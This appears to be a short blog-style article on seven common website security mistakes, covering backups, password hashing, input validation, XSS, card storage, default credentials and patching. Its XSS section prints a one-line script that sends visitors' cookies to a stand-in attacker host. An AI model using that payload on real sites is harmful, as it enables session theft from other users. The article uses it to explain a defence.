Whether you’re building a website, application or server, make sure you don’t make these security mistakes on your next project.
1. Insufficient Backups
Backups are a crucial part of running anything online. They preserve your data in the event of a system crash or user error, and they can also save you from security threats. If you make backups that you rarely check, or you have a backup system in place that’s never been tested, you need to fix that immediately. You do not want to use your backup system for the first time when user data and your reputation are on the line.
For a successful backup, follow the “3-2-1” rule: three copies of all data, stored on two different storage media, with one in a remote location. Your hosting provider likely already provides some backups, but you’ll want backups that you control as well.
2. Improperly Managed Passwords
You might think that, in 2017, no one would be storing passwords in plain text. And yet, it still happens. If you’re going to have user accounts, and you’re going to write your own password system, you need to use a tested password-hashing method. Obviously, this precludes plain text, but it also rules out insecure hashing algorithms like MD5. User passwords should be stored on the server as salted hashes, nothing else. Here are some tips on how to store passwords properly.
3. Unvalidated User Input Vulnerabilities
Ever since the dawn of Web 2.0, online applications have ruled the web. And any web application relies on user input to function. Unfortunately, you also must assume that at least one of your users will be malicious. User input becomes a security issue when malicious users upload computer code as a blog comment or status update. If you don’t protect against this attack, your website will then dutifully execute this code, allowing attackers to run arbitrary code on your website. To avoid this, you need to properly validate user input to only accept valid inputs. You also need to escape user content to break any uploaded code before it can execute.
4. Cross-Site Scripting Attacks
One special type of user input vulnerability is a cross-site scripting attack, or XSS attack. In this attack, a malicious user uploads a script to your website. This code then executes on other users’ computers, siphoning data to hackers. Take the script below, for example:
<script> document.location = 'http://www.hacker.net/cookie.php?' + document.cookie; </script>
If a user uploaded this to a forum, for example, it would execute in the browsers of other users, grabbing their login cookies and passing them along to attackers. To help close this attack vector, encode special characters as HTML entities. For example, < and > need to be converted to &lt; and &gt;, breaking any code between them. That won’t give you perfect protection against an XSS attack, but it’s a good start.
5. Storing Credit Card Information Yourself
Is it possible that you could write a perfectly secure credit card storage system yourself? Of course! But it’s far more likely that hackers will find a small mistake you made, exploit it thoroughly, and make off with tons of credit card information, leaving your company on the hook in a major way. Less likely, but potentially as disastrous, would be running afoul of the strict and obscure PCI regulations that govern storing and processing credit information.
In short, don’t implement your own credit card storage or processing systems. It’s far safer to rely on third party vendors like Authorize.net, Stripe or one of VISA’s certified service providers to handle these transactions. The monthly fee you’ll pay is well worth the peace of mind and built-in PCI compliance.
6. Keeping Default Usernames and Passwords
It’s crucial that you change the default user names and passwords for any hardware or software that you use to run your website. This should be second nature for any tech-savvy professional, but unfortunately it’s not. When changing the default information is cumbersome and the data accessed by the application “doesn’t matter,” it’s easy to talk yourself into keeping default settings for convenience. Hackers rely on this, and often have a database of known default passwords for a wide variety of applications. If they’re attempting to compromise your site, they’ll try all the default WordPress logins, for example, to see if one clicks. Don’t fall into this trap: change your account and password immediately after implementing a new package.
7. Ignoring Patches
New vulnerabilities are found constantly, and software is updated regularly to fix them. But it can be easy to miss these updates, especially when they’re not automatic. That’s why Microsoft recently took the controversial route of forcing Windows 10 updates on users: they’d rather annoy power users than leave millions of innocent but ignorant users vulnerable. If you’re managing servers, you need to be diligent about finding and installing updates for any software you run. Follow vendor websites, sign up for email lists and turn on notifications, because once an attack becomes widespread, you want to be protected against it.
Conclusion: Do Your Research
When you’re working on a new project, you need to be sure that you’re covering all the necessary security holes. Do your research and make sure you’re not making rookie mistakes.